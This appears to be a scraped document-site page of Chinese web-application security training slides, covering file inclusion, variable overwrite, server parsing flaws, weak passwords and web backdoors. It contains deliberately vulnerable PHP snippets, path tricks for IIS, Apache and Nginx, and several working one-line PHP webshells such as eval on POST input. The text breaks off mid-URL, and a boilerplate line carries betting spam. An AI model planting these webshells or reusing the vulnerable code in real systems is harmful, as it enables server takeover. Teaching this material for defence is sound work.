WEB应用安全讲训.ppt

  1. 1、本文档共49页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
WEB应用安全讲训

验证不充分之文件包含 易受攻击的代码片断: ?php $content = $_GET[content]; include($content); ? 攻击者用如下请求可以包含图片木马: /test.php?content=x.jpg 验证不充分之任意文件读取 验证不充分之变量覆盖 易受攻击的代码片段: ?php if ($pass == hello) { $auth = 1; } Parse_str($_SERVER[QUERY_STRING]?); if ($auth == 1) { echo some important information; } ? 上面的代码首先检查用户的密码是否为hello,如果匹配的话,设置$auth 为1,即通过认证。之后如果$suth为1的话,就会显示一些重要信息。 这段代码假定$auth在没有设置值的时候是空的,但是攻击者可以创建任何 全局变量并赋值,通过类似/test.php?auth=1的方法,我 们完全可以欺骗这段代码,使它相信我们是已经认证过的。 逻辑漏洞 不同的用户错误 判断出存在admin用户 逻辑漏洞 找回密码设计缺陷 修改任意用户密码 解析漏洞 IIS 6.0解析漏洞 ①目录解析 /test.asp/test.jpg ②文件解析 /test.asp;1.jpg IIS6.0 默认的可执行文件除了asp还包含这三种 ①/test.asa ②/test.cer ③/test.cdx 解析漏洞 Apache解析漏洞 Apache 是从右到左开始判断解析,如果为不 可识别解析,就再往左判断。 /test.php.xxx /test.php.rar 解析漏洞 Nginx解析漏洞 影响版本:0.5.,0.6., 0.7 = 0.7.65, 0.8 = 0.8.37 /test.jpg/1.php /test.jpg%00.php 第三方漏洞 ①FCKeditor 编辑器上传漏洞,任意创建文件漏洞 ②eWebEeditor编辑器,上传漏洞,遍历目录漏洞 ③ThinkPHP任意代码执行漏洞 ④Struts2远程命令执行漏洞 ⑤Web中间件(Tomcat、Weblogic、Jboss) Struts2远程命令执行 tomcat JBoss Fckeditor/ewebeditor/kindeditor 遍历目录 上传漏洞 构造相应语句 弱口令 什么是弱口令? 弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。 弱口令指的是仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险,因此不推荐用户使用。 弱口令 TOMCAT弱口令直接上传WEBSHELL 弱口令 针对弱口令的爆破 Burpsuite、Hydra等 常见WEB后门介绍 什么是WEBSHELL? 顾名思义,“web”的含义是显然需要服务器开放web服务 “shell”的含义是取得对服务器某种程度上操作权限。webshell 常常被称为匿名用户(入侵者)通过网站端口对网站服务器 的某种程度上操作的权限。由于webshell其大多是以动态脚本 的形式出现,也有人称之为网站的后门工具。 常见WEB后门介绍 PHP后门木马常用函数 执行系统命令: system(), passthru(), shell_exec(), exec(), popen(), proc_open() 代码执行与加密: eval(), assert(), call_user_func(),base64_decode(), gzinflate(), gzuncompress(), gzdecode(), str_rot13() 文件包含与生成: require(), require_once(), include(), include_once(), file_get_contents(), file_put_contents(), fputs(), fwrite() WEB后门介绍 最常见的一句话木马: ?php @eval($_POST[pass]);? 隐蔽的一句话木马: ?php @preg_replace(/e/e,$_POST[h],e);? 完全无特征一句话木马: ?php $_GET[1]($_POST[2]);? ?php $_REQUEST[1]($_REQUEST[2]);? http://loca

文档评论(0)

shaoye348 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档